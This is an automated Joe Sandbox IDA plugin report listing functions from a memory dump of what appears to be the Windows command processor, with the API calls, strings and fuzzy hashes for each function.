                                                                      • Instruction Fuzzy Hash: 7101A2B39040206BAA2157B89C4DD7B3AACF787734B250336F866D24D0D9788C1286E7
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • memset.MSVCRT ref: 0005D954
                                                                      • longjmp.MSVCRT(00080A70,000000FF,00000000,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D96D
                                                                      • memcpy.MSVCRT(?,00000000,00002000,00000000,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D987
                                                                      • longjmp.MSVCRT(00080A70,000000FF,000725C2,000725C0,?,?,?,?,0004D980), ref: 0005D9D3
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Heaplongjmp$AllocProcessmemcpymemset
                                                                      • String ID: 0123456789
                                                                      • API String ID: 2034586978-2793719750
                                                                      • Opcode ID: db81adf32ff9168bc4a9a5f2d9a8af2b4e01df434221d833e00ca547538d24f8
                                                                      • Instruction ID: 44a9ded0ab45dfd509d13b53fb4a1736a2f1df2d636dbf97cced70da378e81e7
                                                                      • Opcode Fuzzy Hash: db81adf32ff9168bc4a9a5f2d9a8af2b4e01df434221d833e00ca547538d24f8
                                                                      • Instruction Fuzzy Hash: 77711AB4F0070697DB249F28CC8566E73B1EB80300F18807ADC4AA7385EB799D46CB99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045074
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 0004515F
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • iswspace.MSVCRT ref: 00059289
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$iswspacememset
                                                                      • String ID: %s
                                                                      • API String ID: 2220997661-3043279178
                                                                      • Opcode ID: 6a0d7b0da57243f8d759248b5dba44cf853e80ef0ea783a75c02690d23c1afa5
                                                                      • Instruction ID: c5229a3a76b8db2f4cde66da85b61dd07325b0aa080dfef28f41c53452724f47
                                                                      • Opcode Fuzzy Hash: 6a0d7b0da57243f8d759248b5dba44cf853e80ef0ea783a75c02690d23c1afa5
                                                                      • Instruction Fuzzy Hash: 4D51D0B5E00612ABDB249BA8DC426BFB3F5EF58311F14446DEC4AE7241EB349E41CB94
                                                                      APIs
                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL(?,?), ref: 00067121
                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,00000000), ref: 00067197
                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 000671FF
                                                                      Strings
                                                                      • Copyright (c) Microsoft Corporation. All rights reserved., xrefs: 000670EE
                                                                      • %WINDOWS_COPYRIGHT%, xrefs: 00067107
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                      • String ID: %WINDOWS_COPYRIGHT%$Copyright (c) Microsoft Corporation. All rights reserved.
                                                                      • API String ID: 1103618819-4062316587
                                                                      • Opcode ID: dc2868ae94fad8092e4811348b586491ad7c6a36875af9a62ff7a9762a98e2f6
                                                                      • Instruction ID: 50dd0ed8b446a8c474873f0215ac679a32b785039baa1e1bd4647ed68a23af4c
                                                                      • Opcode Fuzzy Hash: dc2868ae94fad8092e4811348b586491ad7c6a36875af9a62ff7a9762a98e2f6
                                                                      • Instruction Fuzzy Hash: E341D535B0021587DF60DBA888507BA73E2BF49758F68006AE949EF350EA659E42C350
                                                                      APIs
                                                                      • CreateSemaphoreExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000001,?,00000000,001F0003,?,?,?,?), ref: 00062652
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00062670
                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00062694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateSemaphore
                                                                      • String ID: _p0$wil
                                                                      • API String ID: 4049970386-1814513734
                                                                      • Opcode ID: 0ded961c01e97894c50ba5055fe7a88aecac663fa30a44c021f8043dc2eefd4c
                                                                      • Instruction ID: ad4e60b12726115461581890c2b2cc07d945ee250720f9d63e0627e31a0e9b4a
                                                                      • Opcode Fuzzy Hash: 0ded961c01e97894c50ba5055fe7a88aecac663fa30a44c021f8043dc2eefd4c
                                                                      • Instruction Fuzzy Hash: 7931E071B40A1A8BDB25DF28CD98AEA73F6FF94300F1441A8F80697290DE74DE408B60
                                                                      APIs
                                                                      • _wcsnicmp.MSVCRT ref: 00065295
                                                                        • Part of subcall function 0005727B: __iob_func.MSVCRT ref: 00057280
                                                                      • fprintf.MSVCRT ref: 00065215
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: __iob_func_wcsnicmpfprintf
                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                      • API String ID: 1828771275-2781220306
                                                                      • Opcode ID: e359239bfd4f3b43664b986293ca6608bfce9316f0cb00e24295bd3ede1bb4d1
                                                                      • Instruction ID: 401c97e53b13b8d9cd80d2e2b1fa0465afdd72c01108e916ad2cd707a6354f40
                                                                      • Opcode Fuzzy Hash: e359239bfd4f3b43664b986293ca6608bfce9316f0cb00e24295bd3ede1bb4d1
                                                                      • Instruction Fuzzy Hash: 51315D32F00A139BDB78AB689C55AAE73A2EF55701F140539EC0AA3241EB705E01C699
                                                                      APIs
                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 00044D66
                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 00044D8A
                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00044D95
                                                                      Strings
                                                                      • Software\Microsoft\Windows NT\CurrentVersion, xrefs: 00044D5C
                                                                      • UBR, xrefs: 00044D82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                      • API String ID: 3677997916-3870813718
                                                                      • Opcode ID: 10714081b4f2e024f6962a33a6b79ed0e7e7b0085d3756bfbaca4060bc44ce93
                                                                      • Instruction ID: f4964c1fbd1d42655cc0c059ad17ed0eb6456c670058e3c03f82efd0e1bd219f
                                                                      • Opcode Fuzzy Hash: 10714081b4f2e024f6962a33a6b79ed0e7e7b0085d3756bfbaca4060bc44ce93
                                                                      • Instruction Fuzzy Hash: EC011DB2E40218BBEB619B94DC45FDEBBB8EB84750F100176EA01B6140D2709A41DB58
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0004FD3A
                                                                      • wcsspn.MSVCRT ref: 0004FF18
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00052229,00000000,-00000105,?,00000000,00000000), ref: 0005000F
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D3A
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D44
                                                                        • Part of subcall function 00051CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D57
                                                                        • Part of subcall function 00051CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000480F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00051D61
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$FullNamePathmemsetwcsspn
                                                                      • String ID:
                                                                      • API String ID: 1535828850-0
                                                                      • Opcode ID: 15cfb970c28a7fd6388ae82e16055cc7db6ecc87af0b6582b5428c50f29e3c25
                                                                      • Instruction ID: e0eeaa057670f80a72eff465a5332d1ee3f1db596b61c24d20d5f951e61e796f
                                                                      • Opcode Fuzzy Hash: 15cfb970c28a7fd6388ae82e16055cc7db6ecc87af0b6582b5428c50f29e3c25
                                                                      • Instruction Fuzzy Hash: 64C1A171A00215CFDB68DF18C890BAAB7F6FF48305F5441AED84A9B291EB359E85CF44
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_setjmp3
                                                                      • String ID:
                                                                      • API String ID: 4215035025-0
                                                                      • Opcode ID: 2fac4867f9a9170a97f8175b4a683333f6a14338d5d87be0c0ab9b92dae7ebcd
                                                                      • Instruction ID: 7ef8121fdc320917e6a7a60dce21921aaadcd8ff816071336536f64a3f09b7bf
                                                                      • Opcode Fuzzy Hash: 2fac4867f9a9170a97f8175b4a683333f6a14338d5d87be0c0ab9b92dae7ebcd
                                                                      • Instruction Fuzzy Hash: AB51B5B1E01628DBDB64CF55DC94AEEBBB4FB44341F1400AAEA09A3142DB349F84CF65
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00069631
                                                                      • memset.MSVCRT ref: 0006964F
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                      • _wcsicmp.MSVCRT ref: 000696FD
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 0006971B
                                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,?,?,?,?,00000000,?), ref: 00069733
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_wcsicmp
                                                                      • String ID:
                                                                      • API String ID: 1670951261-0
                                                                      • Opcode ID: ea002562e5bb3a57c1babfe5206204b36826c41968aadf6a0251cc69efbf77a4
                                                                      • Instruction ID: 0248cc1dad35b42231ea355d0a56aa49e38b669869f0b5f016d6722cc2704112
                                                                      • Opcode Fuzzy Hash: ea002562e5bb3a57c1babfe5206204b36826c41968aadf6a0251cc69efbf77a4
                                                                      • Instruction Fuzzy Hash: 0B417171A102195BEF24CBA5DC95BEEB7B9EF04355F0400A9E905E3141DB38DF84CB61
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00069527
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006952F
                                                                      • _get_osfhandle.MSVCRT ref: 000695B5
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 000695BD
                                                                        • Part of subcall function 00068C50: longjmp.MSVCRT(00080A70,00000001,0004206C,00045E68,?,?,?,?,00000000), ref: 00068CC4
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D1D
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D45
                                                                        • Part of subcall function 00068C50: memset.MSVCRT ref: 00068D6D
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000695CC
                                                                        • Part of subcall function 0004A16C: _close.MSVCRT ref: 0004A19B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                                                      • String ID:
                                                                      • API String ID: 288106245-0
                                                                      • Opcode ID: 83656703cb7b7da12822c9d1234d2ad2a7e245016b135926cbb7a628dbe82653
                                                                      • Instruction ID: 7f54ba1992e691708ced9b0fff977111428e0a1278fd4536f63e0ca9a2a2b305
                                                                      • Opcode Fuzzy Hash: 83656703cb7b7da12822c9d1234d2ad2a7e245016b135926cbb7a628dbe82653
                                                                      • Instruction Fuzzy Hash: EE31C171A00604AFEF299F74D849BAE77AEEB84321F20812AF503D6181DB78DD418B50
                                                                      APIs
                                                                        • Part of subcall function 0004DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000), ref: 0004DCE1
                                                                        • Part of subcall function 0004DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004ACD8,00000001,?,00000000,00048C23,-00000105,0006C9B0,00000240,00051E92,00000000,00000000,0005ACE0,00000000,00000000), ref: 0004DCE8
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 00052650
                                                                      • _get_osfhandle.MSVCRT ref: 0005F339
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 0005F347
                                                                      • longjmp.MSVCRT(00080A30,00000001,?,00000104,00000000,?,?,00051775,-00000001,-00000001,-00000001,-00000001), ref: 0005F383
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,000587F0,?,?,?,000587F0,00000000,?,00044A0A), ref: 0005F390
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: BufferConsoleInfoScreen$Heap_get_osfhandle$AllocFileProcessTypelongjmp
                                                                      • String ID:
                                                                      • API String ID: 158340877-0
                                                                      • Opcode ID: f14ab33357cc5534bcc42f6f515b362e3e6797cbd610d5d94eaf9a01a0f6f070
                                                                      • Instruction ID: ebf0a587a6818e1b743b5a06432e4b5b0f2136f047ca5220a684c56a08cf3c56
                                                                      • Opcode Fuzzy Hash: f14ab33357cc5534bcc42f6f515b362e3e6797cbd610d5d94eaf9a01a0f6f070
                                                                      • Instruction Fuzzy Hash: C8318D71A003069BEB24AF74D885ABFB7E8EF44712B10483EE886D2551EB79D909CB50
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 00054CC2
                                                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00068FB3,?,00000000,?,?,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00054CCA
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00060BFC
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00060C48
                                                                      • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00060C71
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 3588551418-0
                                                                      • Opcode ID: 27ca6216c06445e3170448b49e845b81018189019bc4fbda4b49aff3cc95a93e
                                                                      • Instruction ID: 7d7e0c808102398d3d826d4e8ced757536ad5994e05a9267f1339e465e8a5ef6
                                                                      • Opcode Fuzzy Hash: 27ca6216c06445e3170448b49e845b81018189019bc4fbda4b49aff3cc95a93e
                                                                      • Instruction Fuzzy Hash: 8431D471B00105AFEB689F64D8459BF77AAFF85319B20843AE806D3251DB39DD84CB61
                                                                      APIs
                                                                      • _get_osfhandle.MSVCRT ref: 0004E29B
                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0004E2A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 1013686580-0
                                                                      • Opcode ID: 92efd195c76c5acb24c6dedcdc8c915cc79ddfc7c192a383fb0c0366a1dc5a8f
                                                                      • Instruction ID: 5457c6e0f306a29ffec647b01024226a0f31a5c88097dd29921b86fec1c9736f
                                                                      • Opcode Fuzzy Hash: 92efd195c76c5acb24c6dedcdc8c915cc79ddfc7c192a383fb0c0366a1dc5a8f
                                                                      • Instruction Fuzzy Hash: EB11E331204601EFF2342764EC4AB5A3B96FB45722F30052BF509961E1DB799884CB55
                                                                      APIs
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00068571
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0006857E
                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00000000,?,?), ref: 000685C7
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,00000000), ref: 000685D5
                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 000685DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                      • String ID:
                                                                      • API String ID: 3008996577-0
                                                                      • Opcode ID: aa301f0adfc0374bd9919a21c9c09362480d10f21aefe714e526a66e0c5b901f
                                                                      • Instruction ID: 42015e01cf3e446c05c4373c2ba750c09a594273fa998136813cbba02628103a
                                                                      • Opcode Fuzzy Hash: aa301f0adfc0374bd9919a21c9c09362480d10f21aefe714e526a66e0c5b901f
                                                                      • Instruction Fuzzy Hash: 96113075A002099ADF05DFF4DC09AEEB7B9AF0D710F10452AE515E7290EB348A45CB69
                                                                      APIs
                                                                      • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00057122
                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00057131
                                                                      • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 0005713A
                                                                      • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00057143
                                                                      • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00057158
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: c8cd65398425fb8b13754b03e0d19ebd367dd8fe6a63eac48f185a69c6d9f9f6
                                                                      • Instruction ID: 2bdfff0c03ae680ff7130ddad86e48121fac256da9e1766f93f90ec2b5918288
                                                                      • Opcode Fuzzy Hash: c8cd65398425fb8b13754b03e0d19ebd367dd8fe6a63eac48f185a69c6d9f9f6
                                                                      • Instruction Fuzzy Hash: 5D114C75E05208EBEF10DBB8E94869EB7F5FF48311F510856D801E7260E7799B449B42
                                                                      APIs
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,000587E5,00000000,?,00044A0A), ref: 0006484A
                                                                        • Part of subcall function 0004DD98: _get_osfhandle.MSVCRT ref: 0004DDA3
                                                                        • Part of subcall function 0004DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0005C050), ref: 0004DDAD
                                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,000587E5,00000000,?,00044A0A), ref: 00064879
                                                                      • _getch.MSVCRT ref: 0006487F
